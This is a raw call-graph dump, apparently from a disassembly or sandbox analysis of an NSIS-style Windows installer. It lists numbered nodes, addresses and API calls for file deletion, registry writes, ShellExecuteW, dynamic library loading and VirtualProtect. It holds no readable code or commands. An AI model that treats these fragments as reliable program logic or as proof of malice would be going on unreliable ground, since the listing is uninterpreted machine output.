5247->5248 5250 40460b SetDlgItemTextW 5248->5250 5251 404630 5249->5251 5250->5246 5252 4018ef 5253 401926 5252->5253 5254 402b3a 18 API calls 5253->5254 5255 40192b 5254->5255 5256 4057d0 71 API calls 5255->5256 5257 401934 5256->5257 5258 404970 5259 404980 5258->5259 5260 40499c 5258->5260 5269 405708 GetDlgItemTextW 5259->5269 5262 4049a2 SHGetPathFromIDListW 5260->5262 5263 4049cf 5260->5263 5265 4049b9 SendMessageW 5262->5265 5266 4049b2 5262->5266 5264 40498d SendMessageW 5264->5260 5265->5263 5267 40140b 2 API calls 5266->5267 5267->5265 5269->5264 5270 402770 5271 402b3a 18 API calls 5270->5271 5272 402777 FindFirstFileW 5271->5272 5273 40279f 5272->5273 5277 40278a 5272->5277 5274 4027a8 5273->5274 5278 405e8f wsprintfW 5273->5278 5279 405f48 lstrcpynW 5274->5279 5278->5274 5279->5277 5280 4014f1 SetForegroundWindow 5281 4029c7 5280->5281 5282 4018f2 5283 402b3a 18 API calls 5282->5283 5284 4018f9 5283->5284 5285 405724 MessageBoxIndirectW 5284->5285 5286 401902 5285->5286 4462 402573 4463 402b1d 18 API calls 4462->4463 4469 402582 4463->4469 4464 4026a0 4465 4025c8 ReadFile 4465->4464 4465->4469 4466 405c37 ReadFile 4466->4469 4467 4026a2 4474 405e8f wsprintfW 4467->4474 4468 402608 MultiByteToWideChar 4468->4469 4469->4464 4469->4465 4469->4466 4469->4467 4469->4468 4471 4026b3 4469->4471 4472 40262e SetFilePointer MultiByteToWideChar 4469->4472 4471->4464 4473 4026d4 SetFilePointer 4471->4473 4472->4469 4473->4464 4474->4464 5287 401df3 5288 402b3a 18 API calls 5287->5288 5289 401df9 5288->5289 5290 402b3a 18 API calls 5289->5290 5291 401e02 5290->5291 5292 402b3a 18 API calls 5291->5292 5293 401e0b 5292->5293 5294 402b3a 18 API calls 5293->5294 5295 401e14 5294->5295 5296 401423 25 API calls 5295->5296 5297 401e1b ShellExecuteW 5296->5297 5298 401e4c 5297->5298 5304 100016b6 5305 100016e5 5304->5305 5306 10001b18 22 API calls 5305->5306 5307 100016ec 5306->5307 5308 100016f3 5307->5308 5309 100016ff 5307->5309 5310 10001272 2 API calls 5308->5310 5311 10001726 5309->5311 5312 10001709 5309->5312 5315 100016fd 5310->5315 5313 10001750 5311->5313 5314 1000172c 5311->5314 5316 1000153d 3 API calls 5312->5316 5318 1000153d 3 API calls 5313->5318 5317 100015b4 3 API calls 5314->5317 5319 1000170e 5316->5319 5321 10001731 5317->5321 5318->5315 5320 100015b4 3 API calls 5319->5320 5322 10001714 5320->5322 5323 10001272 2 API calls 5321->5323 5324 10001272 2 API calls 5322->5324 5325 10001737 GlobalFree 5323->5325 5326 1000171a GlobalFree 5324->5326 5325->5315 5327 1000174b GlobalFree 5325->5327 5326->5315 5327->5315 5328 10002238 5329 10002296 5328->5329 5331 100022cc 5328->5331 5330 100022a8 GlobalAlloc 5329->5330 5329->5331 5330->5329 4693 4026f9 4694 402700 4693->4694 4697 402972 4693->4697 4695 402b1d 18 API calls 4694->4695 4696 40270b 4695->4696 4698 402712 SetFilePointer 4696->4698 4698->4697 4699 402722 4698->4699 4701 405e8f wsprintfW 4699->4701 4701->4697 5332 1000103d 5333 1000101b 5 API calls 5332->5333 5334 10001056 5333->5334 5335 402c7f 5336 402c91 SetTimer 5335->5336 5337 402caa 5335->5337 5336->5337 5338 402cf8 5337->5338 5339 402cfe MulDiv 5337->5339 5340 402cb8 wsprintfW SetWindowTextW SetDlgItemTextW 5339->5340 5340->5338 5342 4014ff 5343 401507 5342->5343 5345 40151a 5342->5345 5344 402b1d 18 API calls 5343->5344 5344->5345 5346 401000 5347 401037 BeginPaint GetClientRect 5346->5347 5348 40100c DefWindowProcW 5346->5348 5349 4010f3 5347->5349 5351 401179 5348->5351 5352 401073 CreateBrushIndirect FillRect DeleteObject 5349->5352 5353 4010fc 5349->5353 5352->5349 5354 401102 CreateFontIndirectW 5353->5354 5355 401167 EndPaint 5353->5355 5354->5355 5356 401112 6 API calls 5354->5356 5355->5351 5356->5355 5357 401a00 5358 402b3a 18 API calls 5357->5358 5359 401a09 ExpandEnvironmentStringsW 5358->5359 5360 401a1d 5359->5360 5362 401a30 5359->5362 5361 401a22 lstrcmpW 5360->5361 5360->5362 5361->5362 5363 401b01 5364 402b3a 18 API calls 5363->5364 5365 401b08 5364->5365 5366 402b1d 18 API calls 5365->5366 5367 401b11 wsprintfW 5366->5367 5368 4029c7 5367->5368 4264 100027c7 4265 10002817 4264->4265 4266 100027d7 VirtualProtect 4264->4266 4266->4265 5376 401f08 5377 402b3a 18 API calls 5376->5377 5378 401f0f GetFileVersionInfoSizeW 5377->5378 5379 401f36 GlobalAlloc 5378->5379 5380 401f8c 5378->5380 5379->5380 5381 401f4a GetFileVersionInfoW 5379->5381 5381->5380 5382 401f59 VerQueryValueW 5381->5382 5382->5380 5383 401f72 5382->5383 5387 405e8f wsprintfW 5383->5387 5385 401f7e 5388 405e8f wsprintfW 5385->5388 5387->5385 5388->5380 5389 401c8e 5390 402b1d 18 API calls 5389->5390 5391 401c94 IsWindow 5390->5391 5392 4019f0 5391->5392 5393 1000164f 5394 10001516 GlobalFree 5393->5394 5397 10001667 5394->5397 5395 100016ad GlobalFree 5396 10001682 5396->5395 5397->5395 5397->5396 5398 10001699 VirtualFree 5397->5398 5398->5395 5406 401491 5407 4051f2 25 API calls 5406->5407 5408 401498 5407->5408 4498 402295 4499 402b3a 18 API calls 4498->4499 4500 4022a4 4499->4500 4501 402b3a 18 API calls 4500->4501 4502 4022ad 4501->4502 4503 402b3a 18 API calls 4502->4503 4504 4022b7 GetPrivateProfileStringW 4503->4504 4510 401f98 4511 401faa 4510->4511 4521 40205c 4510->4521 4512 402b3a 18 API calls 4511->4512 4513 401fb1 4512->4513 4515 402b3a 18 API calls 4513->4515 4514 401423 25 API calls 4516 402197 4514->4516 4517 401fba 4515->4517 4518 401fd0 LoadLibraryExW 4517->4518 4519 401fc2 GetModuleHandleW 4517->4519 4520 401fe1 4518->4520 4518->4521 4519->4518 4519->4520 4533 40631e WideCharToMultiByte 4520->4533 4521->4514 4524 401ff2 4527 402011 4524->4527 4528 401ffa 4524->4528 4525 40202b 4526 4051f2 25 API calls 4525->4526 4529 402002 4526->4529 4536 10001759 4527->4536 4530 401423 25 API calls 4528->4530 4529->4516 4531 40204e FreeLibrary 4529->4531 4530->4529 4531->4516 4534 406348 GetProcAddress 4533->4534 4535 401fec 4533->4535 4534->4535 4535->4524 4535->4525 4537 10001789 4536->4537 4578 10001b18 4537->4578 4539 10001790 4540 100018a6 4539->4540 4541 100017a1 4539->4541 4542 100017a8 4539->4542 4540->4529 4627 10002286 4541->4627 4610 100022d0 4542->4610 4547 100017cd 4548 1000180c 4547->4548 4549 100017ee 4547->4549 4553 10001812 4548->4553 4554 1000184e 4548->4554 4640 100024a9 4549->4640 4551 100017be 4552 100017c4 4551->4552 4558 100017cf 4551->4558 4552->4547 4621 100028a4 4552->4621 4560 100015b4 3 API calls 4553->4560 4556 100024a9 10 API calls 4554->4556 4555 100017d7 4555->4547 4637 10002b5f 4555->4637 4562 10001840 4556->4562 4557 100017f4 4651 100015b4 4557->4651 4631 10002645 4558->4631 4565 10001828 4560->4565 4569 10001895 4562->4569 4662 1000246c 4562->4662 4568 100024a9 10 API calls 4565->4568 4567 100017d5 4567->4547 4568->4562 4569->4540 4573 1000189f GlobalFree 4569->4573 4573->4540 4575 10001881 4575->4569 4666 1000153d wsprintfW 4575->4666 4576 1000187a FreeLibrary 4576->4575 4669 1000121b GlobalAlloc 4578->4669 4580 10001b3c 4670 1000121b GlobalAlloc 4580->4670 4582 10001d7a GlobalFree GlobalFree GlobalFree 4583 10001d97 4582->4583 4594 10001de1 4582->4594 4585 100020ee 4583->4585 4583->4594 4595 10001dac 4583->4595 4584 10001b47 4584->4582 4586 10001c1d GlobalAlloc 4584->4586 4588 10001c86 GlobalFree 4584->4588 4591 10001c68 lstrcpyW 4584->4591 4592 10001c72 lstrcpyW 4584->4592 4584->4594 4599 10002048 4584->4599 4603 10001f37 GlobalFree 4584->4603 4606 1000122c 2 API calls 4584->4606 4608 10001cc4 4584->4608 4676 1000121b GlobalAlloc 4584->4676 4587 10002110 GetModuleHandleW 4585->4587 4585->4594 4586->4584 4589 10002121 LoadLibraryW 4587->4589 4590 10002136 4587->4590 4588->4584 4589->4590 4589->4594 4677 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4590->4677 4591->4592 4592->4584 4594->4539 4595->4594 4673 1000122c 4595->4673 4596 10002188 4596->4594 4598 10002195 lstrlenW 4596->4598 4678 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4598->4678 4599->4594 4602 10002090 lstrcpyW 4599->4602 4602->4594 4603->4584 4604 10002148 4604->4596 4609 10002172 GetProcAddress 4604->4609 4605 100021af 4605->4594 4606->4584 4608->4584 4671 1000158f GlobalSize GlobalAlloc 4608->4671 4609->4596 4612 100022e8 4610->4612 4611 1000122c GlobalAlloc lstrcpynW 4611->4612 4612->4611 4614 10002415 GlobalFree 4612->4614 4616 100023d3 lstrlenW 4612->4616 4617 100023ba GlobalAlloc 4612->4617 4618 1000238f GlobalAlloc WideCharToMultiByte 4612->4618 4680 100012ba 4612->4680 4614->4612 4615 100017ae 4614->4615 4615->4547 4615->4551 4615->4555 4616->4614 4619 100023d1 4616->4619 4617->4619 4618->4614 4619->4614 4684 100025d9 4619->4684 4623 100028b6 4621->4623 4622 1000295b SetFilePointer 4624 10002979 4622->4624 4623->4622 4625 10002a75 4624->4625 4626 10002a6a GetLastError 4624->4626 4625->4547 4626->4625 4628 10002296 4627->4628 4630 100017a7 4627->4630 4629 100022a8 GlobalAlloc 4628->4629 4628->4630 4629->4628 4630->4542 4635 10002661 4631->4635 4632 100026b2 GlobalAlloc 4636 100026d4 4632->4636 4633 100026c5 4634 100026ca GlobalSize 4633->4634 4633->4636 4634->4636 4635->4632 4635->4633 4636->4567 4639 10002b6a 4637->4639 4638 10002baa GlobalFree 4639->4638 4687 1000121b GlobalAlloc 4640->4687 4642 10002530 StringFromGUID2 4645 100024b3 4642->4645 4643 10002541 lstrcpynW 4643->4645 4644 1000250b MultiByteToWideChar 4644->4645 4645->4642 4645->4643 4645->4644 4646 10002554 wsprintfW 4645->4646 4647 10002571 GlobalFree 4645->4647 4648 100025ac GlobalFree 4645->4648 4649 10001272 2 API calls 4645->4649 4688 100012e1 4645->4688 4646->4645 4647->4645 4648->4557 4649->4645 4692 1000121b GlobalAlloc 4651->4692 4653 100015ba 4654 100015c7 lstrcpyW 4653->4654 4656 100015e1 4653->4656 4657 100015fb 4654->4657 4656->4657 4658 100015e6 wsprintfW 4656->4658 4659 10001272 4657->4659 4658->4657 4660 100012b5 GlobalFree 4659->4660 4661 1000127b GlobalAlloc lstrcpynW 4659->4661 4660->4562 4661->4660 4663 10001861 4662->4663 4664 1000247a 4662->4664 4663->4575 4663->4576 4664->4663 4665 10002496 GlobalFree 4664->4665 4665->4664 4667 10001272 2 API calls 4666->4667 4668 1000155e 4667->4668 4668->4569 4669->4580 4670->4584 4672 100015ad 4671->4672 4672->4608 4679 1000121b GlobalAlloc 4673->4679 4675 1000123b lstrcpynW 4675->4594 4676->4584 4677->4604 4678->4605 4679->4675 4681 100012c1 4680->4681 4682 1000122c 2 API calls 4681->4682 4683 100012df 4682->4683 4683->4612 4685 100025e7 VirtualAlloc 4684->4685 4686 1000263d 4684->4686 4685->4686 4686->4619 4687->4645 4689 100012ea 4688->4689 4690 1000130c 4688->4690 4689->4690 4691 100012f0 lstrcpyW 4689->4691 4690->4645 4691->4690 4692->4653 5409 10001058 5411 10001074 5409->5411 5410 100010dd 5411->5410 5412 10001092 5411->5412 5413 10001516 GlobalFree 5411->5413 5414 10001516 GlobalFree 5412->5414 5413->5412 5415 100010a2 5414->5415 5416 100010b2 5415->5416 5417 100010a9 GlobalSize 5415->5417 5418 100010b6 GlobalAlloc 5416->5418 5419 100010c7 5416->5419 5417->5416 5420 1000153d 3 API calls 5418->5420 5421 100010d2 GlobalFree 5419->5421 5420->5419 5421->5410 5422 401718 5423 402b3a 18 API calls 5422->5423 5424 40171f SearchPathW 5423->5424 5425 40173a 5424->5425 4932 40159b 4933 402b3a 18 API calls 4932->4933 4934 4015a2 SetFileAttributesW 4933->4934 4935 4015b4 4934->4935 5426 40659d 5430 406421 5426->5430 5427 406d8c 5428 4064a2 GlobalFree 5429 4064ab GlobalAlloc 5428->5429 5429->5427 5429->5430 5430->5427 5430->5428 5430->5429 5430->5430 5431 406522 GlobalAlloc 5430->5431 5432 406519 GlobalFree 5430->5432 5431->5427 5431->5430 5432->5431 5433 40149e 5434 4014ac PostQuitMessage 5433->5434 5435 40223e 5433->5435 5434->5435 5436 4021a0 5437 402b3a 18 API calls 5436->5437 5438 4021a6 5437->5438 5439 402b3a 18 API calls 5438->5439 5440 4021af 5439->5440 5441 402b3a 18 API calls 5440->5441 5442 4021b8 5441->5442 5443 40628b 2 API calls 5442->5443 5444 4021c1 5443->5444 5445 4021d2 lstrlenW lstrlenW 5444->5445 5446 4021c5 5444->5446 5448 4051f2 25 API calls 5445->5448 5447 4051f2 25 API calls 5446->5447 5450 4021cd 5446->5450 5447->5450 5449 402210 SHFileOperationW 5448->5449 5449->5446 5449->5450 5451 100010e1 5460 10001111 5451->5460 5452 100011d8 GlobalFree 5453 100012ba 2 API calls 5453->5460 5454 100011d3 5454->5452 5455 10001164 GlobalAlloc 5455->5460 5456 100011f8 GlobalFree 5456->5460 5457 10001272 2 API calls 5458 100011c4 GlobalFree 5457->5458 5458->5460 5459 100012e1 lstrcpyW 5459->5460 5460->5452 5460->5453 5460->5454 5460->5455 5460->5456 5460->5457 5460->5458 5460->5459 5461 401b22 5462 401b73 5461->5462 5463 401b2f 5461->5463 5464 401b9d GlobalAlloc 5462->5464 5467 401b78 5462->5467 5468 401bb8 5463->5468 5469 401b46 5463->5469 5465 405f6a 18 API calls 5464->5465 5465->5468 5466 405f6a 18 API calls 5470 402238 5466->5470 5474 40223e 5467->5474 5482 405f48 lstrcpynW 5467->5482 5468->5466 5468->5474 5480 405f48 lstrcpynW 5469->5480 5476 405724 MessageBoxIndirectW 5470->5476 5473 401b8a GlobalFree 5473->5474 5475 401b55 5481 405f48 lstrcpynW 5475->5481 5476->5474 5478 401b64 5483 405f48 lstrcpynW 5478->5483 5480->5475 5481->5478 5482->5473 5483->5474 5484 4029a2 SendMessageW 5485 4029c7 5484->5485 5486 4029bc InvalidateRect 5484->5486 5486->5485 4110 401924 4111 401926 4110->4111 4112 402b3a 18 API calls 4111->4112 4113 40192b 4112->4113 4116 4057d0 4113->4116 4155 405a9b 4116->4155 4119 4057f8 DeleteFileW 4121 401934 4119->4121 4120 40580f 4122 40592f 4120->4122 4169 405f48 lstrcpynW 4120->4169 4122->4121 4199 40628b FindFirstFileW 4122->4199 4124 405835 4125 405848 4124->4125 4126 40583b lstrcatW 4124->4126 4170 4059df lstrlenW 4125->4170 4127 40584e 4126->4127 4130 40585e lstrcatW 4127->4130 4132 405869 lstrlenW FindFirstFileW 4127->4132 4130->4132 4132->4122 4140 40588b 4132->4140 4133 405958 4202 405993 lstrlenW CharPrevW 4133->4202 4136 405912 FindNextFileW 4136->4140 4141 405928 FindClose 4136->4141 4137 405788 5 API calls 4139 40596a 4137->4139 4142 405984 4139->4142 4143 40596e 4139->4143 4140->4136 4153 4058d3 4140->4153 4174 405f48 lstrcpynW 4140->4174 4141->4122 4145 4051f2 25 API calls 4142->4145 4143->4121 4146 4051f2 25 API calls 4143->4146 4145->4121 4148 40597b 4146->4148 4147 4057d0 64 API calls 4147->4153 4150 405de2 40 API calls 4148->4150 4149 4051f2 25 API calls 4149->4136 4151 405982 4150->4151 4151->4121 4153->4136 4153->4147 4153->4149 4175 405788 4153->4175 4183 4051f2 4153->4183 4194 405de2 4153->4194 4205 405f48 lstrcpynW 4155->4205 4157 405aac 4206 405a3e CharNextW CharNextW 4157->4206 4160 4057f0 4160->4119 4160->4120 4161 4061dc 5 API calls 4167 405ac2 4161->4167 4162 405af3 lstrlenW 4163 405afe 4162->4163 4162->4167 4164 405993 3 API calls 4163->4164 4166 405b03 GetFileAttributesW 4164->4166 4165 40628b 2 API calls 4165->4167 4166->4160 4167->4160 4167->4162 4167->4165 4168 4059df 2 API calls 4167->4168 4168->4162 4169->4124 4171 4059ed 4170->4171 4172 4059f3 CharPrevW 4171->4172 4173 4059ff 4171->4173 4172->4171 4172->4173 4173->4127 4174->4140 4212 405b8f GetFileAttributesW 4175->4212 4178 4057b5 4178->4153 4179 4057a3 RemoveDirectoryW 4181 4057b1 4179->4181 4180 4057ab DeleteFileW 4180->4181 4181->4178 4182 4057c1 SetFileAttributesW 4181->4182 4182->4178 4184 40520d 4183->4184 4185 4052af 4183->4185 4186 405229 lstrlenW 4184->4186 4187 405f6a 18 API calls 4184->4187 4185->4153 4188 405252 4186->4188 4189 405237 lstrlenW 4186->4189 4187->4186 4190 405265 4188->4190 4191 405258 SetWindowTextW 4188->4191 4189->4185 4192 405249 lstrcatW 4189->4192 4190->4185 4193 40526b SendMessageW SendMessageW SendMessageW 4190->4193 4191->4190 4192->4188 4193->4185 4215 4062b2 GetModuleHandleA 4194->4215 4198 405e0a 4198->4153 4200 4062a1 FindClose 4199->4200 4201 405954 4199->4201 4200->4201 4201->4121 4201->4133 4203 40595e 4202->4203 4204 4059af lstrcatW 4202->4204 4203->4137 4204->4203 4205->4157 4207 405a5b 4206->4207 4210 405a6d 4206->4210 4209 405a68 CharNextW 4207->4209 4207->4210 4208 405a91 4208->4160 4208->4161 4209->4208 4210->4208 4211 4059c0 CharNextW 4210->4211 4211->4210 4213 405ba1 SetFileAttributesW 4212->4213 4214 405794 4212->4214 4213->4214 4214->4178 4214->4179 4214->4180 4216 4062d9 GetProcAddress 4215->4216 4217 4062ce LoadLibraryA 4215->4217 4218 405de9 4216->4218 4217->4216 4217->4218 4218->4198 4219 405c66 lstrcpyW 4218->4219 4220 405cb5 GetShortPathNameW 4219->4220 4221 405c8f 4219->4221 4223 405cca 4220->4223 4224 405ddc 4220->4224 4244 405bb4 GetFileAttributesW CreateFileW 4221->4244 4223->4224 4226 405cd2 wsprintfA 4223->4226 4224->4198 4225 405c99 CloseHandle GetShortPathNameW 4225->4224 4227 405cad 4225->4227 4228 405f6a 18 API calls 4226->4228 4227->4220 4227->4224 4229 405cfa 4228->4229 4245 405bb4 GetFileAttributesW CreateFileW 4229->4245 4231 405d07 4231->4224 4232 405d16 GetFileSize GlobalAlloc 4231->4232 4233 405dd5 CloseHandle 4232->4233 4234 405d38 4232->4234 4233->4224 4246 405c37 ReadFile 4234->4246 4239 405d57 lstrcpyA 4242 405d79 4239->4242 4240 405d6b 4241 405b19 4 API calls 4240->4241 4241->4242 4243 405db0 SetFilePointer WriteFile GlobalFree 4242->4243 4243->4233 4244->4225 4245->4231 4247 405c55 4246->4247 4247->4233 4248 405b19 lstrlenA 4247->4248 4249 405b5a lstrlenA 4248->4249 4250 405b62 4249->4250 4251 405b33 lstrcmpiA 4249->4251 4250->4239 4250->4240 4251->4250 4252 405b51 CharNextA 4251->4252 4252->4249 5487 402224 5488 40223e 5487->5488 5489 40222b 5487->5489 5490 405f6a 18 API calls 5489->5490 5491 402238 5490->5491 5492 405724 MessageBoxIndirectW 5491->5492 5492->5488 5500 402729 5501 402730 5500->5501 5502 4029c7 5500->5502 5503 402736 FindClose 5501->5503 5503->5502 5504 401cab 5505 402b1d 18 API calls 5504->5505 5506 401cb2 5505->5506 5507 402b1d 18 API calls 5506->5507 5508 401cba GetDlgItem 5507->5508 5509 4024e8 5508->5509 5510 4042ae lstrcpynW lstrlenW 5511 4016af 5512 402b3a 18 API calls 5511->5512 5513 4016b5 GetFullPathNameW 5512->5513 5514 4016f1 5513->5514 5515 4016cf 5513->5515 5516 401706 GetShortPathNameW 5514->5516 5517 4029c7 5514->5517 5515->5514 5518 40628b 2 API calls 5515->5518 5516->5517 5519 4016e1 5518->5519 5519->5514 5521 405f48 lstrcpynW 5519->5521 5521->5514 4289 405331 4290 405352 GetDlgItem GetDlgItem GetDlgItem 4289->4290 4291 4054dd 4289->4291 4335 4041cf SendMessageW 4290->4335 4293 4054e6 GetDlgItem CreateThread CloseHandle 4291->4293 4294 40550e 4291->4294 4293->4294 4338 4052c5 OleInitialize 4293->4338 4296 405539 4294->4296 4297 405525 ShowWindow ShowWindow 4294->4297 4298 40555e 4294->4298 4295 4053c3 4302 4053ca GetClientRect GetSystemMetrics SendMessageW SendMessageW 4295->4302 4299 405545 4296->4299 4300 405599 4296->4300 4337 4041cf SendMessageW 4297->4337 4301 404201 8 API calls 4298->4301 4304 405573 ShowWindow 4299->4304 4305 40554d 4299->4305 4300->4298 4311 4055a7 SendMessageW 4300->4311 4306 40556c 4301->4306 4309 405439 4302->4309 4310 40541d SendMessageW SendMessageW 4302->4310 4307 405593 4304->4307 4308 405585 4304->4308 4312 404173 SendMessageW 4305->4312 4314 404173 SendMessageW 4307->4314 4313 4051f2 25 API calls 4308->4313 4315 40544c 4309->4315 4316 40543e SendMessageW 4309->4316 4310->4309 4311->4306 4317 4055c0 CreatePopupMenu 4311->4317 4312->4298 4313->4307 4314->4300 4319 40419a 19 API calls 4315->4319 4316->4315 4318 405f6a 18 API calls 4317->4318 4320 4055d0 AppendMenuW 4318->4320 4321 40545c 4319->4321 4322 405600 TrackPopupMenu 4320->4322 4323 4055ed GetWindowRect 4320->4323 4324 405465 ShowWindow 4321->4324 4325 405499 GetDlgItem SendMessageW 4321->4325 4322->4306 4326 40561b 4322->4326 4323->4322 4327 405488 4324->4327 4328 40547b ShowWindow 4324->4328 4325->4306 4329 4054c0 SendMessageW SendMessageW 4325->4329 4330 405637 SendMessageW 4326->4330 4336 4041cf SendMessageW 4327->4336 4328->4327 4329->4306 4330->4330 4331 405654 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4330->4331 4333 405679 SendMessageW 4331->4333 4333->4333 4334 4056a2 GlobalUnlock SetClipboardData CloseClipboard 4333->4334 4334->4306 4335->4295 4336->4325 4337->4296 4339 4041e6 SendMessageW 4338->4339 4340 4052e8 4339->4340 4343 40530f 4340->4343 4344 401389 2 API calls 4340->4344 4341 4041e6 SendMessageW 4342 405321 OleUninitialize 4341->4342 4343->4341 4344->4340 5522 402331 5523 402337 5522->5523 5524 402b3a 18 API calls 5523->5524 5525 402349 5524->5525 5526 402b3a 18 API calls 5525->5526 5527 402353 RegCreateKeyExW 5526->5527 5528 40237d 5527->5528 5530 402793 5527->5530 5529 402398 5528->5529 5531 402b3a 18 API calls 5528->5531 5533 402b1d 18 API calls 5529->5533 5534 4023a4 5529->5534 5532 40238e lstrlenW 5531->5532 5532->5529 5533->5534 5535 4023bf RegSetValueExW 5534->5535 5536 403062 46 API calls 5534->5536 5537 4023d5 RegCloseKey 5535->5537 5536->5535 5537->5530 5539 404635 5540 404661 5539->5540 5541 404672 5539->5541 5600 405708 GetDlgItemTextW 5540->5600 5542 40467e GetDlgItem 5541->5542 5549 4046dd 5541->5549 5545 404692 5542->5545 5544 40466c 5547 4061dc 5 API calls 5544->5547 5548 4046a6 SetWindowTextW 5545->5548 5552 405a3e 4 API calls 5545->5552 5546 4047c1 5598 404955 5546->5598 5602 405708 GetDlgItemTextW 5546->5602 5547->5541 5553 40419a 19 API calls 5548->5553 5549->5546 5554 405f6a 18 API calls 5549->5554 5549->5598 5551 404201 8 API calls 5556 404969 5551->5556 5557 40469c 5552->5557 5558 4046c2 5553->5558 5559 404751 SHBrowseForFolderW 5554->5559 5555 4047f1 5560 405a9b 18 API calls 5555->5560 5557->5548 5564 405993 3 API calls 5557->5564 5561 40419a 19 API calls 5558->5561 5559->5546 5562 404769 CoTaskMemFree 5559->5562 5563 4047f7 5560->5563 5565 4046d0 5561->5565 5566 405993 3 API calls 5562->5566 5603 405f48 lstrcpynW 5563->5603 5564->5548 5601 4041cf SendMessageW 5565->5601 5568 404776 5566->5568 5571 4047ad SetDlgItemTextW 5568->5571 5575 405f6a 18 API calls 5568->5575 5570 4046d6 5573 4062b2 3 API calls 5570->5573 5571->5546 5572 40480e 5574 4062b2 3 API calls 5572->5574 5573->5549 5582 404816 5574->5582 5576 404795 lstrcmpiW 5575->5576 5576->5571 5578 4047a6 lstrcatW 5576->5578 5577 404855 5604 405f48 lstrcpynW 5577->5604 5578->5571 5580 40485c 5581 405a3e 4 API calls 5580->5581 5583 404862 GetDiskFreeSpaceW 5581->5583 5582->5577 5586 4059df 2 API calls 5582->5586 5587 4048a7 5582->5587 5585 404885 MulDiv 5583->5585 5583->5587 5585->5587 5586->5582 5588 4049d6 21 API calls 5587->5588 5597 404904 5587->5597 5589 4048f6 5588->5589 5592 404906 SetDlgItemTextW 5589->5592 5593 4048fb 5589->5593 5590 40140b 2 API calls 5591 404927 5590->5591 5605 4041bc KiUserCallbackDispatcher 5591->5605 5592->5597 5595 4049d6 21 API calls 5593->5595 5595->5597 5596 404943 5596->5598 5606 4045ca 5596->5606 5597->5590 5597->5591 5598->5551 5600->5544 5601->5570 5602->5555 5603->5572 5604->5580 5605->5596 5607 4045d8 5606->5607 5608 4045dd SendMessageW 5606->5608 5607->5608 5608->5598 5609 4027b5 5610 402b3a 18 API calls 5609->5610 5611 4027c3 5610->5611 5612 4027d9 5611->5612 5613 402b3a 18 API calls 5611->5613 5614 405b8f 2 API calls 5612->5614 5613->5612 5615 4027df 5614->5615 5635 405bb4 GetFileAttributesW CreateFileW 5615->5635 5617 4027ec 5618 402895 5617->5618 5619 4027f8 GlobalAlloc 5617->5619 5622 4028b0 5618->5622 5623 40289d DeleteFileW 5618->5623 5620 402811 5619->5620 5621 40288c CloseHandle 5619->5621 5636 40330f SetFilePointer 5620->5636 5621->5618 5623->5622 5625 402817 5626 4032f9 ReadFile 5625->5626 5627 402820 GlobalAlloc 5626->5627 5628 402830 5627->5628 5629 402864 WriteFile GlobalFree 5627->5629 5630 403062 46 API calls 5628->5630 5631 403062 46 API calls 5629->5631 5634 40283d 5630->5634 5632 402889 5631->5632 5632->5621 5633 40285b GlobalFree 5633->5629 5634->5633 5635->5617 5636->5625 5637 4028b6 5638 402b1d 18 API calls 5637->5638 5639 4028bc 5638->5639 5640 4028f8 5639->5640 5641 4028df 5639->5641 5645 402793 5639->5645 5643 402902 5640->5643 5644 40290e 5640->5644 5642 4028e4 5641->5642 5650 4028f5 5641->5650 5651 405f48 lstrcpynW 5642->5651 5646 402b1d 18 API calls 5643->5646 5647 405f6a 18 API calls 5644->5647 5646->5650 5647->5650 5650->5645 5652 405e8f wsprintfW 5650->5652 5651->5645 5652->5645 5653 404337 5654 40434f 5653->5654 5660 404469 5653->5660 5658 40419a 19 API calls 5654->5658 5655 4044d3 5656 4045a5 5655->5656 5657 4044dd GetDlgItem 5655->5657 5663 404201 8 API calls 5656->5663 5659 4044f7 5657->5659 5664 404566 5657->5664 5662 4043b6 5658->5662 5659->5664 5668 40451d 6 API calls 5659->5668 5660->5655 5660->5656 5661 4044a4 GetDlgItem SendMessageW 5660->5661 5684 4041bc KiUserCallbackDispatcher 5661->5684 5666 40419a 19 API calls 5662->5666 5667 4045a0 5663->5667 5664->5656 5669 404578 5664->5669 5671 4043c3 CheckDlgButton 5666->5671 5668->5664 5672 40458e 5669->5672 5673 40457e SendMessageW 5669->5673 5670 4044ce 5674 4045ca SendMessageW 5670->5674 5682 4041bc KiUserCallbackDispatcher 5671->5682 5672->5667 5676 404594 SendMessageW 5672->5676 5673->5672 5674->5655 5676->5667 5677 4043e1 GetDlgItem 5683 4041cf SendMessageW 5677->5683 5679 4043f7 SendMessageW 5680 404414 GetSysColor 5679->5680 5681 40441d SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5679->5681 5680->5681 5681->5667 5682->5677 5683->5679 5684->5670 5685 4014b8 5686 4014be 5685->5686 5687 401389 2 API calls 5686->5687 5688 4014c6 5687->5688 4702 4015b9 4703 402b3a 18 API calls 4702->4703 4704 4015c0 4703->4704 4705 405a3e 4 API calls 4704->4705 4713 4015c9 4705->4713 4706 401614 4708 401619 4706->4708 4709 401646 4706->4709 4707 4059c0 CharNextW 4710 4015d7 CreateDirectoryW 4707->4710 4711 401423 25 API calls 4708->4711 4715 401423 25 API calls 4709->4715 4710->4713 4714 4015ed GetLastError 4710->4714 4712 401620 4711->4712 4720 405f48 lstrcpynW 4712->4720 4713->4706 4713->4707 4714->4713 4717 4015fa GetFileAttributesW 4714->4717 4719 40163e 4715->4719 4717->4713 4718 40162d SetCurrentDirectoryW 4718->4719 4720->4718 5689 401939 5690 402b3a 18 API calls 5689->5690 5691 401940 lstrlenW 5690->5691 5692 4024e8 5691->5692 5693 40293b 5694 402b1d 18 API calls 5693->5694 5695 402941 5694->5695 5696 402974 5695->5696 5697 402793 5695->5697 5699 40294f 5695->5699 5696->5697 5698 405f6a 18 API calls 5696->5698 5698->5697 5699->5697 5701 405e8f wsprintfW 5699->5701 5701->5697 5702 40683c 5704 406421 5702->5704 5703 406d8c 5704->5703 5705 4064a2 GlobalFree 5704->5705 5706 4064ab GlobalAlloc 5704->5706 5707 406522 GlobalAlloc 5704->5707 5708 406519 GlobalFree 5704->5708 5705->5706 5706->5703 5706->5704 5707->5703 5707->5704 5708->5707 4936 40173f 4937 402b3a 18 API calls 4936->4937 4938 401746 4937->4938 4939 405be3 2 API calls 4938->4939 4940 40174d 4939->4940 4941 405be3 2 API calls 4940->4941 4941->4940 5709 10002a7f 5710 10002a97 5709->5710 5711 1000158f 2 API calls 5710->5711 5712 10002ab2 